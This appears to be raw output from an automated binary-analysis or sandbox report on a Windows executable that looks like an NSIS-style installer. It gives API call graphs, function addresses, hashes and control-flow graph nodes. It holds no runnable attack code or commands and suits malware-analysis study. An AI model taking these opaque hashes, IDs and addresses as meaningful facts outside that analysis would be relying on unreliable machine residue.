401c7e IsWindow 3477->3478 3479 4019e1 3478->3479 3480 40227d 3481 402a07 18 API calls 3480->3481 3482 40228e 3481->3482 3483 402a07 18 API calls 3482->3483 3484 402297 3483->3484 3485 402a07 18 API calls 3484->3485 3486 4022a1 GetPrivateProfileStringA 3485->3486 3487 40427e 3488 4042b4 3487->3488 3489 40428e 3487->3489 3491 403eee 8 API calls 3488->3491 3490 403e87 19 API calls 3489->3490 3492 40429b SetDlgItemTextA 3490->3492 3493 4042c0 3491->3493 3492->3488 3494 4014fe 3495 401506 3494->3495 3497 401519 3494->3497 3496 4029ea 18 API calls 3495->3496 3496->3497 3498 401000 3499 401037 BeginPaint GetClientRect 3498->3499 3500 40100c DefWindowProcA 3498->3500 3502 4010f3 3499->3502 3503 401179 3500->3503 3504 401073 CreateBrushIndirect FillRect DeleteObject 3502->3504 3505 4010fc 3502->3505 3504->3502 3506 401102 CreateFontIndirectA 3505->3506 3507 401167 EndPaint 3505->3507 3506->3507 3508 401112 6 API calls 3506->3508 3507->3503 3508->3507 3509 404801 GetDlgItem GetDlgItem 3510 404853 7 API calls 3509->3510 3513 404a6b 3509->3513 3511 4048f6 DeleteObject 3510->3511 3512 4048e9 SendMessageA 3510->3512 3514 4048ff 3511->3514 3512->3511 3530 404b4f 3513->3530 3541 404adc 3513->3541 3562 40474f SendMessageA 3513->3562 3515 404936 3514->3515 3516 405b99 18 API calls 3514->3516 3517 403e87 19 API calls 3515->3517 3519 404918 SendMessageA SendMessageA 3516->3519 3522 40494a 3517->3522 3518 404bfb 3520 404c05 SendMessageA 3518->3520 3521 404c0d 3518->3521 3519->3514 3520->3521 3531 404c26 3521->3531 3532 404c1f ImageList_Destroy 3521->3532 3538 404c36 3521->3538 3527 403e87 19 API calls 3522->3527 3523 404a5e 3524 403eee 8 API calls 3523->3524 3529 404df1 3524->3529 3525 404b41 SendMessageA 3525->3530 3544 404958 3527->3544 3528 404ba8 SendMessageA 3528->3523 3534 404bbd SendMessageA 3528->3534 3530->3518 3530->3523 3530->3528 3536 404c2f GlobalFree 3531->3536 3531->3538 3532->3531 3533 404da5 3533->3523 3539 404db7 ShowWindow GetDlgItem ShowWindow 3533->3539 3535 404bd0 3534->3535 3546 404be1 SendMessageA 3535->3546 3536->3538 3537 404a2c GetWindowLongA SetWindowLongA 3540 404a45 3537->3540 3538->3533 3555 404c71 3538->3555 3567 4047cf 3538->3567 3539->3523 3542 404a63 3540->3542 3543 404a4b ShowWindow 3540->3543 3541->3525 3541->3530 3561 403ebc SendMessageA 3542->3561 3560 403ebc SendMessageA 3543->3560 3544->3537 3545 4049a7 SendMessageA 3544->3545 3547 404a26 3544->3547 3550 4049e3 SendMessageA 3544->3550 3551 4049f4 SendMessageA 3544->3551 3545->3544 3546->3518 3547->3537 3547->3540 3550->3544 3551->3544 3553 404d7b InvalidateRect 3553->3533 3554 404d91 3553->3554 3557 40466d 21 API calls 3554->3557 3556 404c9f SendMessageA 3555->3556 3559 404cb5 3555->3559 3556->3559 3557->3533 3558 404d29 SendMessageA SendMessageA 3558->3559 3559->3553 3559->3558 3560->3523 3561->3513 3563 404772 GetMessagePos ScreenToClient SendMessageA 3562->3563 3564 4047ae SendMessageA 3562->3564 3565 4047a6 3563->3565 3566 4047ab 3563->3566 3564->3565 3565->3541 3566->3564 3576 405b77 lstrcpynA 3567->3576 3569 4047e2 3577 405ad5 wsprintfA 3569->3577 3571 4047ec 3572 40140b 2 API calls 3571->3572 3573 4047f5 3572->3573 3578 405b77 lstrcpynA 3573->3578 3575 4047fc 3575->3555 3576->3569 3577->3571 3578->3575 3579 402e84 3580 402e95 3579->3580 3581 402eb1 3580->3581 3593 4030a4 SetFilePointer 3580->3593 3583 403072 ReadFile 3581->3583 3584 402ebc GetTickCount 3583->3584 3587 402fec 3584->3587 3589 402ef7 3584->3589 3586 403072 ReadFile 3586->3589 3588 402f4d GetTickCount 3588->3589 3589->3586 3589->3587 3589->3588 3590 402f76 MulDiv wsprintfA 3589->3590 3591 402fb4 WriteFile 3589->3591 3592 404e84 25 API calls 3590->3592 3591->3587 3591->3589 3592->3589 3593->3581 3594 401705 3595 402a07 18 API calls 3594->3595 3596 40170c SearchPathA 3595->3596 3597 401727 3596->3597 3598 404607 3599 404633 3598->3599 3600 404617 3598->3600 3602 404666 3599->3602 3603 404639 SHGetPathFromIDListA 3599->3603 3609 40538c GetDlgItemTextA 3600->3609 3605 404650 SendMessageA 3603->3605 3606 404649 3603->3606 3604 404624 SendMessageA 3604->3599 3605->3602 3607 40140b 2 API calls 3606->3607 3607->3605 3609->3604 3610 404e07 3611 404e1b IsWindowVisible 3610->3611 3612 404e0b 3610->3612 3614 404e31 3611->3614 3615 404e65 3611->3615 3613 403ed3 SendMessageA 3612->3613 3616 404e18 3613->3616 3617 40474f 5 API calls 3614->3617 3618 404e6a CallWindowProcA 3615->3618 3619 404e3b 3617->3619 3618->3616 3619->3618 3620 4047cf 4 API calls 3619->3620 3620->3615 3621 402188 3622 402a07 18 API calls 3621->3622 3623 40218e 3622->3623 3624 402a07 18 API calls 3623->3624 3625 402197 3624->3625 3626 402a07 18 API calls 3625->3626 3627 4021a0 3626->3627 3628 405e7b 2 API calls 3627->3628 3629 4021a9 3628->3629 3630 4021ba lstrlenA lstrlenA 3629->3630 3631 4021ad 3629->3631 3633 404e84 25 API calls 3630->3633 3632 404e84 25 API calls 3631->3632 3635 4021b5 3631->3635 3632->3635 3634 4021f6 SHFileOperationA 3633->3634 3634->3631 3634->3635 3636 403188 3637 403192 3636->3637 3638 40564f CharNextA 3637->3638 3639 40319c CharNextA 3638->3639 3643 4031ac 3639->3643 3640 403271 GetTempPathA 3642 4030bb 11 API calls 3640->3642 3644 40329c DeleteFileA 3642->3644 3643->3640 3646 40564f CharNextA 3643->3646 3647 403305 3644->3647 3646->3643 3650 40564f CharNextA 3647->3650 3679 403390 3647->3679 3689 4033a0 3647->3689 3648 403548 74 API calls 3651 4033a9 OleUninitialize 3648->3651 3649 403622 54 API calls 3649->3689 3652 403325 3650->3652 3653 4033b9 3651->3653 3654 4034ad 3651->3654 3659 40336b 3652->3659 3660 4033cf lstrcatA lstrcmpiA 3652->3660 3656 4053a8 MessageBoxIndirectA 3653->3656 3655 403530 ExitProcess 3654->3655 3657 405ea2 3 API calls 3654->3657 3661 4033c7 ExitProcess 3656->3661 3662 4034bc 3657->3662 3663 405712 18 API calls 3659->3663 3664 4033eb CreateDirectoryA SetCurrentDirectoryA 3660->3664 3660->3689 3665 405ea2 3 API calls 3662->3665 3670 403376 3663->3670 3666 403402 3664->3666 3667 40340d 3664->3667 3669 4034c5 3665->3669 3696 405b77 lstrcpynA 3666->3696 3697 405b77 lstrcpynA 3667->3697 3672 405ea2 3 API calls 3669->3672 3670->3689 3694 405b77 lstrcpynA 3670->3694 3675 4034ce 3672->3675 3674 403385 3695 405b77 lstrcpynA 3674->3695 3678 40351c ExitWindowsEx 3675->3678 3684 4034dc GetCurrentProcess 3675->3684 3677 405b99 18 API calls 3680 40344c DeleteFileA 3677->3680 3678->3655 3681 403529 3678->3681 3679->3649 3682 403459 CopyFileA 3680->3682 3691 40341b 3680->3691 3683 40140b 2 API calls 3681->3683 3682->3691 3683->3655 3688 4034ec 3684->3688 3685 4034a1 3686 405a2b 40 API calls 3685->3686 3686->3689 3687 405a2b 40 API calls 3687->3691 3688->3678 3689->3648 3690 405b99 18 API calls 3690->3691 3691->3677 3691->3685 3691->3687 3691->3690 3692 405347 2 API calls 3691->3692 3693 40348d CloseHandle 3691->3693 3692->3691 3693->3691 3694->3674 3695->3679 3696->3667 3697->3691 3698 40220a 3699 402211 3698->3699 3702 402224 3698->3702 3700 405b99 18 API calls 3699->3700 3701 40221e 3700->3701 3703 4053a8 MessageBoxIndirectA 3701->3703 3703->3702 3704 40260c 3705 402613 3704->3705 3706 40289c 3704->3706 3707 402619 FindClose 3705->3707 3707->3706 3708 40268d 3709 402a07 18 API calls 3708->3709 3710 40269b 3709->3710 3711 4026b1 3710->3711 3712 402a07 18 API calls 3710->3712 3713 405800 2 API calls 3711->3713 3712->3711 3714 4026b7 3713->3714 3731 405825 GetFileAttributesA CreateFileA 3714->3731 3716 4026c4 3717 4026d0 GlobalAlloc 3716->3717 3718 40276d 3716->3718 3721 402764 CloseHandle 3717->3721 3722 4026e9 3717->3722 3719 402775 DeleteFileA 3718->3719 3720 402788 3718->3720 3719->3720 3721->3718 3732 4030a4 SetFilePointer 3722->3732 3724 4026ef 3725 403072 ReadFile 3724->3725 3726 4026f8 GlobalAlloc 3725->3726 3727 40273c WriteFile GlobalFree 3726->3727 3729 402708 3726->3729 3728 402761 3727->3728 3728->3721 3730 402733 GlobalFree 3729->3730 3730->3727 3731->3716 3732->3724 3733 40278e 3734 4029ea 18 API calls 3733->3734 3735 402794 3734->3735 3736 4027b8 3735->3736 3737 4027cf 3735->3737 3743 40266d 3735->3743 3738 4027bd 3736->3738 3746 4027cc 3736->3746 3739 4027e5 3737->3739 3740 4027d9 3737->3740 3747 405b77 lstrcpynA 3738->3747 3742 405b99 18 API calls 3739->3742 3741 4029ea 18 API calls 3740->3741 3741->3746 3742->3746 3746->3743 3748 405ad5 wsprintfA 3746->3748 3747->3743 3748->3743 3749 401490 3750 404e84 25 API calls 3749->3750 3751 401497 3750->3751 3752 401b11 3753 401b62 3752->3753 3754 401b1e 3752->3754 3755 401b66 3753->3755 3756 401b8b GlobalAlloc 3753->3756 3759 401b35 3754->3759 3761 401ba6 3754->3761 3768 402224 3755->3768 3773 405b77 lstrcpynA 3755->3773 3758 405b99 18 API calls 3756->3758 3757 405b99 18 API calls 3763 40221e 3757->3763 3758->3761 3771 405b77 lstrcpynA 3759->3771 3761->3757 3761->3768 3766 4053a8 MessageBoxIndirectA 3763->3766 3764 401b78 GlobalFree 3764->3768 3765 401b44 3772 405b77 lstrcpynA 3765->3772 3766->3768 3769 401b53 3774 405b77 lstrcpynA 3769->3774 3771->3765 3772->3769 3773->3764 3774->3768 3775 402814 3776 4029ea 18 API calls 3775->3776 3777 40281a 3776->3777 3778 402828 3777->3778 3779 40284b 3777->3779 3780 40266d 3777->3780 3778->3780 3783 405ad5 wsprintfA 3778->3783 3779->3780 3781 405b99 18 API calls 3779->3781 3781->3780 3783->3780 3784 401595 3785 402a07 18 API calls 3784->3785 3786 40159c SetFileAttributesA 3785->3786 3787 4015ae 3786->3787 3788 401c95 3789 4029ea 18 API calls 3788->3789 3790 401c9c 3789->3790 3791 4029ea 18 API calls 3790->3791 3792 401ca4 GetDlgItem 3791->3792 3793 4024c9 3792->3793 3794 402517 3795 4029ea 18 API calls 3794->3795 3798 402521 3795->3798 3796 402597 3797 402555 ReadFile 3797->3796 3797->3798 3798->3796 3798->3797 3799 402599 3798->3799 3801 4025a9 3798->3801 3803 405ad5 wsprintfA 3799->3803 3801->3796 3802 4025bf SetFilePointer 3801->3802 3802->3796 3803->3796 3804 401918 3805 40191a 3804->3805 3806 402a07 18 API calls 3805->3806 3807 40191f 3806->3807 3808 405454 71 API calls 3807->3808 3809 401928 3808->3809 3810 40231a 3811 402320 3810->3811 3812 402a07 18 API calls 3811->3812 3813 402332 3812->3813 3814 402a07 18 API calls 3813->3814 3815 40233c RegCreateKeyExA 3814->3815 3816 402366 3815->3816 3817 40289c 3815->3817 3818 40237e 3816->3818 3819 402a07 18 API calls 3816->3819 3822 4029ea 18 API calls 3818->3822 3823 40238a 3818->3823 3821 402377 lstrlenA 3819->3821 3820 4023a5 RegSetValueExA 3824 4023bb RegCloseKey 3820->3824 3821->3818 3822->3823 3823->3820 3824->3817 3826 403f9b lstrcpynA lstrlenA 3827 404e1c 3828 404e24 IsWindowVisible 3827->3828 3833 404e3b 3827->3833 3829 404e31 3828->3829 3835 404e65 3828->3835 3830 40474f 5 API calls 3829->3830 3830->3833 3831 404e6a CallWindowProcA 3832 404e7e 3831->3832 3833->3831 3834 4047cf 4 API calls 3833->3834 3834->3835 3835->3831 3836 4016a1 3837 402a07 18 API calls 3836->3837 3838 4016a7 GetFullPathNameA 3837->3838 3839 4016df 3838->3839 3840 4016be 3838->3840 3841 4016f3 GetShortPathNameA 3839->3841 3842 40289c 3839->3842 3840->3839 3843 405e7b 2 API calls 3840->3843 3841->3842 3844 4016cf 3843->3844 3844->3839 3846 405b77 lstrcpynA 3844->3846 3846->3839 3847 401d26 GetDC GetDeviceCaps 3848 4029ea 18 API calls 3847->3848 3849 401d44 MulDiv ReleaseDC 3848->3849 3850 4029ea 18 API calls 3849->3850 3851 401d63 3850->3851 3852 405b99 18 API calls 3851->3852 3853 401d9c CreateFontIndirectA 3852->3853 3854 4024c9 3853->3854 3855 402626 3856 402629 3855->3856 3858 402641 3855->3858 3857 402636 FindNextFileA 3856->3857 3857->3858 3859 402680 3857->3859 3861 405b77 lstrcpynA 3859->3861 3861->3858 3862 40172c 3863 402a07 18 API calls 3862->3863 3864 401733 3863->3864 3865 405854 2 API calls 3864->3865 3866 40173a 3865->3866 3866->3866 3867 401dac 3868 4029ea 18 API calls 3867->3868 3869 401db2 3868->3869 3870 4029ea 18 API calls 3869->3870 3871 401dbb 3870->3871 3872 401dc2 ShowWindow 3871->3872 3873 401dcd EnableWindow 3871->3873 3874 40289c 3872->3874 3873->3874 3875 401eac 3876 402a07 18 API calls 3875->3876 3877 401eb3 3876->3877 3878 405e7b 2 API calls 3877->3878 3879 401eb9 3878->3879 3880 401ecb 3879->3880 3882 405ad5 wsprintfA 3879->3882 3882->3880 3883 40192d 3884 402a07 18 API calls 3883->3884 3885 401934 lstrlenA 3884->3885 3886 4024c9 3885->3886 3887 4024ad 3888 402a07 18 API calls 3887->3888 3889 4024b4 3888->3889 3892 405825 GetFileAttributesA CreateFileA 3889->3892 3891 4024c0 3892->3891 3893 401cb0 3894 4029ea 18 API calls 3893->3894 3895 401cc0 SetWindowLongA 3894->3895 3896 40289c 3895->3896 3897 401a31 3898 4029ea 18 API calls 3897->3898 3899 401a37 3898->3899 3900 4029ea 18 API calls 3899->3900 3901 4019e1 3900->3901 3902 4031b1 3902->3902 3904 4031ac 3902->3904 3903 40564f CharNextA 3903->3904 3904->3903 3905 403271 GetTempPathA 3904->3905 3907 4030bb 11 API calls 3905->3907 3908 40329c DeleteFileA 3907->3908 3910 403305 3908->3910 3913 40564f CharNextA 3910->3913 3942 403390 3910->3942 3952 4033a0 3910->3952 3911 403548 74 API calls 3914 4033a9 OleUninitialize 3911->3914 3912 403622 54 API calls 3912->3952 3918 403325 3913->3918 3915 4033b9 3914->3915 3916 4034ad 3914->3916 3919 4053a8 MessageBoxIndirectA 3915->3919 3917 403530 ExitProcess 3916->3917 3920 405ea2 3 API calls 3916->3920 3922 40336b 3918->3922 3923 4033cf lstrcatA lstrcmpiA 3918->3923 3924 4033c7 ExitProcess 3919->3924 3925 4034bc 3920->3925 3926 405712 18 API calls 3922->3926 3927 4033eb CreateDirectoryA SetCurrentDirectoryA 3923->3927 3923->3952 3928 405ea2 3 API calls 3925->3928 3929 403376 3926->3929 3930 403402 3927->3930 3931 40340d 3927->3931 3933 4034c5 3928->3933 3929->3952 3957 405b77 lstrcpynA 3929->3957 3959 405b77 lstrcpynA 3930->3959 3960 405b77 lstrcpynA 3931->3960 3935 405ea2 3 API calls 3933->3935 3938 4034ce 3935->3938 3937 403385 3958 405b77 lstrcpynA 3937->3958 3941 40351c ExitWindowsEx 3938->3941 3947 4034dc GetCurrentProcess 3938->3947 3940 405b99 18 API calls 3943 40344c DeleteFileA 3940->3943 3941->3917 3944 403529 3941->3944 3942->3912 3945 403459 CopyFileA 3943->3945 3954 40341b 3943->3954 3946 40140b 2 API calls 3944->3946 3945->3954 3946->3917 3951 4034ec 3947->3951 3948 4034a1 3949 405a2b 40 API calls 3948->3949 3949->3952 3950 405a2b 40 API calls 3950->3954 3951->3941 3952->3911 3953 405b99 18 API calls 3953->3954 3954->3940 3954->3948 3954->3950 3954->3953 3955 405347 2 API calls 3954->3955 3956 40348d CloseHandle 3954->3956 3955->3954 3956->3954 3957->3937 3958->3942 3959->3931 3960->3954 3961 401e32 3962 402a07 18 API calls 3961->3962 3963 401e38 3962->3963 3964 404e84 25 API calls 3963->3964 3965 401e42 3964->3965 3966 405347 2 API calls 3965->3966 3970 401e48 3966->3970 3967 401e9e CloseHandle 3969 40266d 3967->3969 3968 401e67 WaitForSingleObject 3968->3970 3971 401e75 GetExitCodeProcess 3968->3971 3970->3967 3970->3968 3970->3969 3972 405edb 2 API calls 3970->3972 3973 401e90 3971->3973 3974 401e87 3971->3974 3972->3968 3973->3967 3976 405ad5 wsprintfA 3974->3976 3976->3973 3977 4015b3 3978 402a07 18 API calls 3977->3978 3979 4015ba 3978->3979 3980 4056bd 4 API calls 3979->3980 3989 4015c2 3980->3989 3981 40160a 3982 401638 3981->3982 3983 40160f 3981->3983 3988 401423 25 API calls 3982->3988 3985 401423 25 API calls 3983->3985 3984 40564f CharNextA 3986 4015d0 CreateDirectoryA 3984->3986 3987 401616 3985->3987 3986->3989 3990 4015e5 GetLastError 3986->3990 3995 405b77 lstrcpynA 3987->3995 3994 401630 3988->3994 3989->3981 3989->3984 3990->3989 3991 4015f2 GetFileAttributesA 3990->3991 3991->3989 3993 401621 SetCurrentDirectoryA 3993->3994 3995->3993 3996 4039b4 3997 403b07 3996->3997 3998 4039cc 3996->3998 4000 403b58 3997->4000 4001 403b18 GetDlgItem GetDlgItem 3997->4001 3998->3997 3999 4039d8 3998->3999 4004 4039e3 SetWindowPos 3999->4004 4005 4039f6 3999->4005 4003 403bb2 4000->4003 4013 401389 2 API calls 4000->4013 4002 403e87 19 API calls 4001->4002 4008 403b42 SetClassLongA 4002->4008 4009 403ed3 SendMessageA 4003->4009 4055 403b02 4003->4055 4004->4005 4006 403a13 4005->4006 4007 4039fb ShowWindow 4005->4007 4010 403a35 4006->4010 4011 403a1b DestroyWindow 4006->4011 4007->4006 4012 40140b 2 API calls 4008->4012 4053 403bc4 4009->4053 4014 403a3a SetWindowLongA 4010->4014 4015 403a4b 4010->4015 4063 403e10 4011->4063 4012->4000 4016 403b8a 4013->4016 4014->4055 4018 403a57 GetDlgItem 4015->4018 4030 403ac2 4015->4030 4016->4003 4019 403b8e SendMessageA 4016->4019 4017 403e12 DestroyWindow EndDialog 4017->4063 4021 403a6a SendMessageA IsWindowEnabled 4018->4021 4025 403a87 4018->4025 4019->4055 4020 40140b 2 API calls 4020->4053 4021->4025 4021->4055 4022 403eee 8 API calls 4022->4055 4023 403e41 ShowWindow 4023->4055 4024 405b99 18 API calls 4024->4053 4026 403a94 4025->4026 4028 403adb SendMessageA 4025->4028 4029 403aa7 4025->4029 4036 403a8c 4025->4036 4026->4028 4026->4036 4027 403e60 SendMessageA 4027->4030 4028->4030 4031 403ac4 4029->4031 4032 403aaf 4029->4032 4030->4022 4035 40140b 2 API calls 4031->4035 4033 40140b 2 API calls 4032->4033 4033->4036 4034 403e87 19 API calls 4034->4053 4035->4036 4036->4027 4036->4030 4037 403e87 19 API calls 4038 403c3f GetDlgItem 4037->4038 4039 403c54 4038->4039 4040 403c5c ShowWindow EnableWindow 4038->4040 4039->4040 4064 403ea9 EnableWindow 4040->4064 4042 403c86 EnableWindow 4045 403c9a 4042->4045 4043 403c9f GetSystemMenu EnableMenuItem SendMessageA 4044 403ccf SendMessageA 4043->4044 4043->4045 4044->4045 4045->4043 4065 403ebc SendMessageA 4045->4065 4066 405b77 lstrcpynA 4045->4066 4048 403cfd lstrlenA 4049 405b99 18 API calls 4048->4049 4050 403d0e SetWindowTextA 4049->4050 4051 401389 2 API calls 4050->4051 4051->4053 4052 403d52 DestroyWindow 4054 403d6c CreateDialogParamA 4052->4054 4052->4063 4053->4017 4053->4020 4053->4024 4053->4034 4053->4037 4053->4052 4053->4055 4056 403d9f 4054->4056 4054->4063 4057 403e87 19 API calls 4056->4057 4058 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4057->4058 4059 401389 2 API calls 4058->4059 4060 403df0 4059->4060 4060->4055 4061 403df8 ShowWindow 4060->4061 4062 403ed3 SendMessageA 4061->4062 4062->4063 4063->4023 4063->4055 4064->4042 4065->4045 4066->4048 4067 402036 4068 402a07 18 API calls 4067->4068 4069 40203d 4068->4069 4070 402a07 18 API calls 4069->4070 4071 402047 4070->4071 4072 402a07 18 API calls 4071->4072 4073 402050 4072->4073 4074 402a07 18 API calls 4073->4074 4075 40205a 4074->4075 4076 402a07 18 API calls 4075->4076 4077 402064 4076->4077 4078 402078 CoCreateInstance 4077->4078 4079 402a07 18 API calls 4077->4079 4080 40214d 4078->4080 4083 402097 4078->4083 4079->4078 4081 401423 25 API calls 4080->4081 4082 40217f 4080->4082 4081->4082 4083->4080 4084 40212c MultiByteToWideChar 4083->4084 4084->4080 4085 4014b7 4086 4014bd 4085->4086 4087 401389 2 API calls 4086->4087 4088 4014c5 4087->4088 4089 402438 4090 402b11 19 API calls 4089->4090 4091 402442 4090->4091 4092 4029ea 18 API calls 4091->4092 4093 40244b 4092->4093 4094 40266d 4093->4094 4095 402462 RegEnumKeyA 4093->4095 4096 40246e RegEnumValueA 4093->4096 4097 402487 RegCloseKey 4095->4097 4096->4094 4096->4097 4097->4094 4099 401bb8 4100 4029ea 18 API calls 4099->4100 4101 401bbf 4100->4101 4102 4029ea 18 API calls 4101->4102 4103 401bc9 4102->4103 4104 401bd9 4103->4104 4105 402a07 18 API calls 4103->4105 4108 402a07 18 API calls 4104->4108 4111 401be9 4104->4111 4105->4104 4106 401bf4 4109 4029ea 18 API calls 4106->4109 4107 401c38 4110 402a07 18 API calls 4107->4110 4108->4111 4112 401bf9 4109->4112 4113 401c3d 4110->4113 4111->4106 4111->4107 4114 4029ea 18 API calls 4112->4114 4115 402a07 18 API calls 4113->4115 4116 401c02 4114->4116 4117 401c46 FindWindowExA 4115->4117 4118 401c28 SendMessageA 4116->4118 4119 401c0a SendMessageTimeoutA 4116->4119 4120 401c64 4117->4120 4118->4120 4119->4120 4121 402239 4122 402241 4121->4122 4123 402247 4121->4123 4124 402a07 18 API calls 4122->4124 4125 402257 4123->4125 4126 402a07 18 API calls 4123->4126 4124->4123 4127 402a07 18 API calls 4125->4127 4129 402265 4125->4129 4126->4125 4127->4129 4128 402a07 18 API calls 4130 40226e WritePrivateProfileStringA 4128->4130 4129->4128 4131 4022be 4132 4022c3 4131->4132 4133 4022ee 4131->4133 4135 402b11 19 API calls 4132->4135 4134 402a07 18 API calls 4133->4134 4136 4022f5 4134->4136 4137 4022ca 4135->4137 4142 402a47 RegOpenKeyExA 4136->4142 4138 402a07 18 API calls 4137->4138 4141 40230b 4137->4141 4139 4022db RegDeleteValueA RegCloseKey 4138->4139 4139->4141 4145 402a72 4142->4145 4151 402abe 4142->4151 4143 402a98 RegEnumKeyA 4144 402aaa RegCloseKey 4143->4144 4143->4145 4147 405ea2 3 API calls 4144->4147 4145->4143 4145->4144 4146 402acf RegCloseKey 4145->4146 4148 402a47 3 API calls 4145->4148 4146->4151 4149 402aba 4147->4149 4148->4145 4150 402aea RegDeleteKeyA 4149->4150 4149->4151 4150->4151 4151->4141 4152 40163f 4153 402a07 18 API calls 4152->4153 4154 401645 4153->4154 4155 405e7b 2 API calls 4154->4155 4156 40164b 4155->4156 4157 40173f 4158 402a07 18 API calls 4157->4158 4159 401746 4158->4159 4160 401764 4159->4160 4161 40176c 4159->4161 4193 405b77 lstrcpynA 4160->4193 4194 405b77 lstrcpynA 4161->4194 4164 401777 4166 405624 3 API calls 4164->4166 4165 40176a 4168 405de2 5 API calls 4165->4168 4167 40177d lstrcatA 4166->4167 4167->4165 4187 401789 4168->4187 4169 405e7b 2 API calls 4169->4187 4170 405800 2 API calls 4170->4187 4172 4017a0 CompareFileTime 4172->4187 4173 401864 4175 404e84 25 API calls 4173->4175 4174 40183b 4176 404e84 25 API calls 4174->4176 4192 401850 4174->4192 4178 40186e 4175->4178 4176->4192 4177 401895 SetFileTime 4180 4018a7 CloseHandle 4177->4180 4178->4177 4178->4180 4179 405b99 18 API calls 4179->4187 4181 4018b8 4180->4181 4180->4192 4182 4018d0 4181->4182 4183 4018bd 4181->4183 4186 405b99 18 API calls 4182->4186 4185 405b99 18 API calls 4183->4185 4184 405b77 lstrcpynA 4184->4187 4188 4018c5 lstrcatA 4185->4188 4189 4018d8 4186->4189 4187->4169 4187->4170 4187->4172 4187->4173 4187->4174 4187->4179 4187->4184 4190 4053a8 MessageBoxIndirectA 4187->4190 4195 405825 GetFileAttributesA CreateFileA 4187->4195 4188->4189 4191 4053a8 MessageBoxIndirectA 4189->4191 4190->4187 4191->4192 4193->4165 4194->4164 4195->4187 4196 40193f 4197 4029ea 18 API calls 4196->4197 4198 401946 4197->4198 4199 4029ea 18 API calls 4198->4199 4200 401950 4199->4200 4201 402a07 18 API calls 4200->4201 4202 401959 4201->4202 4203 40196c lstrlenA 4202->4203 4207 4019a7 4202->4207 4204 401976 4203->4204 4204->4207 4209 405b77 lstrcpynA 4204->4209 4206 401990 4206->4207 4208 40199d lstrlenA 4206->4208 4208->4207 4209->4206

                                      Executed Functions

                                      Function 05191C83 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • Sleep.KERNELBASE(00000005), ref: 05191CD8
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606940540.0000000004CE6000.00000040.00000400.00020000.00000000.sdmp, Offset: 04CE6000, based on PE: false
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: a87fffe04863857890f8b96ea649a37a322763b6f0a9565940e87421010e622a
                                      • Instruction ID: ae1f1f5b7e234b93b53a9f24a0a5fe7b42b86ebdf73e3a3ccc6da2013c8301e8
                                      • Opcode Fuzzy Hash: a87fffe04863857890f8b96ea649a37a322763b6f0a9565940e87421010e622a
                                      • Instruction Fuzzy Hash: BD1106B1680740AFD7599F71898CB5A73A1AF143A5F858A84E9528B0A6D7B8C8C0CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00404801 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 63 404801-40484d GetDlgItem * 2 64 404853-4048e7 GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 63->64 65 404a6d-404a74 63->65 66 4048f6-4048fd DeleteObject 64->66 67 4048e9-4048f4 SendMessageA 64->67 68 404a76-404a86 65->68 69 404a88 65->69 71 4048ff-404907 66->71 67->66 70 404a8b-404a94 68->70 69->70 72 404a96-404a99 70->72 73 404a9f-404aa5 70->73 74 404930-404934 71->74 75 404909-40490c 71->75 72->73 76 404b83-404b8a 72->76 79 404ab4-404abb 73->79 80 404aa7-404aae 73->80 74->71 81 404936-404962 call 403e87 * 2 74->81 77 404911-40492e call 405b99 SendMessageA * 2 75->77 78 40490e 75->78 86 404bfb-404c03 76->86 87 404b8c-404b92 76->87 77->74 78->77 83 404b30-404b33 79->83 84 404abd-404ac0 79->84 80->76 80->79 122 404968-40496e 81->122 123 404a2c-404a3f GetWindowLongA SetWindowLongA 81->123 83->76 88 404b35-404b3f 83->88 92 404ac2-404ac9 84->92 93 404acb-404ae0 call 40474f 84->93 90 404c05-404c0b SendMessageA 86->90 91 404c0d-404c14 86->91 95 404de3-404df5 call 403eee 87->95 96 404b98-404ba2 87->96 98 404b41-404b4d SendMessageA 88->98 99 404b4f-404b59 88->99 90->91 100 404c16-404c1d 91->100 101 404c48-404c4f 91->101 92->83 92->93 93->83 121 404ae2-404af3 93->121 96->95 104 404ba8-404bb7 SendMessageA 96->104 98->99 99->76 106 404b5b-404b65 99->106 107 404c26-404c2d 100->107 108 404c1f-404c20 ImageList_Destroy 100->108 111 404da5-404dac 101->111 112 404c55-404c61 call 4011ef 101->112 104->95 113 404bbd-404bce SendMessageA 104->113 117 404b76-404b80 106->117 118 404b67-404b74 106->118 119 404c36-404c42 107->119 120 404c2f-404c30 GlobalFree 107->120 108->107 111->95 116 404dae-404db5 111->116 131 404c71-404c74 112->131 132 404c63-404c66 112->132 114 404bd0-404bd6 113->114 115 404bd8-404bda 113->115 114->115 126 404bdb-404bf4 call 401299 SendMessageA 114->126 115->126 116->95 127 404db7-404de1 ShowWindow GetDlgItem ShowWindow 116->127 117->76 118->76 119->101 120->119 121->83 129 404af5-404af7 121->129 130 404971-404977 122->130 128 404a45-404a49 123->128 126->86 127->95 134 404a63-404a6b call 403ebc 128->134 135 404a4b-404a5e ShowWindow call 403ebc 128->135 136 404af9-404b00 129->136 137 404b0a 129->137 138 404a0d-404a20 130->138 139 40497d-4049a5 130->139 147 404cb5-404cd9 call 4011ef 131->147 148 404c76-404c8f call 4012e2 call 401299 131->148 143 404c68 132->143 144 404c69-404c6c call 4047cf 132->144 134->65 135->95 151 404b02-404b04 136->151 152 404b06-404b08 136->152 142 404b0d-404b29 call 40117d 137->142 138->130 146 404a26-404a2a 138->146 140 4049a7-4049dd SendMessageA 139->140 141 4049df-4049e1 139->141 140->138 154 4049e3-4049f2 SendMessageA 141->154 155 4049f4-404a0a SendMessageA 141->155 142->83 143->144 144->131 146->123 146->128 164 404d7b-404d8f InvalidateRect 147->164 165 404cdf 147->165 173 404c91-404c97 148->173 174 404c9f-404cae SendMessageA 148->174 151->142 152->142 154->138 155->138 164->111 169 404d91-404da0 call 404722 call 40466d 164->169 167 404ce2-404ced 165->167 170 404d63-404d75 167->170 171 404cef-404cfe 167->171 169->111 170->164 170->167 175 404d00-404d0d 171->175 176 404d11-404d14 171->176 177 404c99 173->177 